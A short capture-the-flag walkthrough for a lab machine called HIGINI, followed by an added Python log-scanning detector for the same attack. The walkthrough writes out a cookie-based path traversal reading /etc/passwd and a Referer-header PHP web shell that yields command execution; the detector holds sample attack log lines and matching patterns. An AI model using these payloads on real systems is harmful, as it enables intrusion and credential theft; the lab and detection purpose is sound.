Just knocked over HIGINI if anyone is interested.
This is basically the approach I took step by step:
- nmap -> find ports 22+80
- View source -> find creds ‘test’ and ‘test’. Enter creds but they don’t go far. Some page called ‘expenses.php’ which doesn’t exist (useful later).
- Hit up ‘/robots.txt’. Find /dev.
- Download pages -> note obvious LFI from the ‘users’ cookie. Guess that the same pages in /dev are available in /. Test with …/…/…/…/etc/passwd as the user cookie and the LFI works
- Using the path /proc/self/fd/2 shows the error log. Note the instance of the ‘referer’ header being written out - particularly when the expenses.php file can’t be found
- Log in again, but this time polluting the referer header with the <?php echo('thisworks!'); system($_GET['cmd']); ?> string.
- Reroll the 5th step - note the ‘thisworks!’ string being printed.
- Passing in cmd=ls as the query yields RCE.
DB credentials can be found at this point.
Don’t see obvious privesc yet.
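Added example (not from the post above): a small log-side detector for the chain described there, written from the defender's side. It assumes Apache combined-format access logs with the request Cookie header appended as a final quoted field; the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines: Apache "combined" format with the Cookie header
# appended as a final quoted field (made up for this example, not real log data).
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /dev/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "users=test"
10.0.0.7 - - [01/Jan/2024:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "users=../../../../etc/passwd"
10.0.0.7 - - [01/Jan/2024:10:01:30 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0" "users=%2e%2e%2f%2e%2e%2fetc%2fpasswd"
10.0.0.7 - - [01/Jan/2024:10:02:31 +0000] "GET /login.php HTTP/1.1" 302 0 "<?php system($_GET['cmd']); ?>" "Mozilla/5.0" "users=test"
10.0.0.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0" "users=/proc/self/fd/2"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# (rule name, log field it applies to, pattern). Field values are URL-decoded
# before matching so percent-encoded traversal is caught too.
RULES = [
    ("traversal_in_cookie", "cookie", re.compile(r"\.\./")),
    ("proc_fd_in_cookie", "cookie", re.compile(r"/proc/self/fd/\d+")),
    ("php_tag_in_referer", "referer", re.compile(r"<\?(php|=)", re.IGNORECASE)),
    ("cmd_param_in_request", "request", re.compile(r"[?&]cmd=", re.IGNORECASE)),
]


def scan_log(text):
    """Return (line_no, rule_name, decoded_value) for every rule hit, in file order."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unexpected format; a real pipeline should count these, not drop them
        for name, field, pattern in RULES:
            value = unquote(m.group(field))
            if pattern.search(value):
                hits.append((line_no, name, value))
    return hits


if __name__ == "__main__":
    for line_no, name, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {name}: {value}")
```

A single hit on the referer rule is worth alerting on by itself; the pairing of a cookie pointing at /proc/self/fd/N with a cmd= parameter on the same client is the sign the poisoned log is being included.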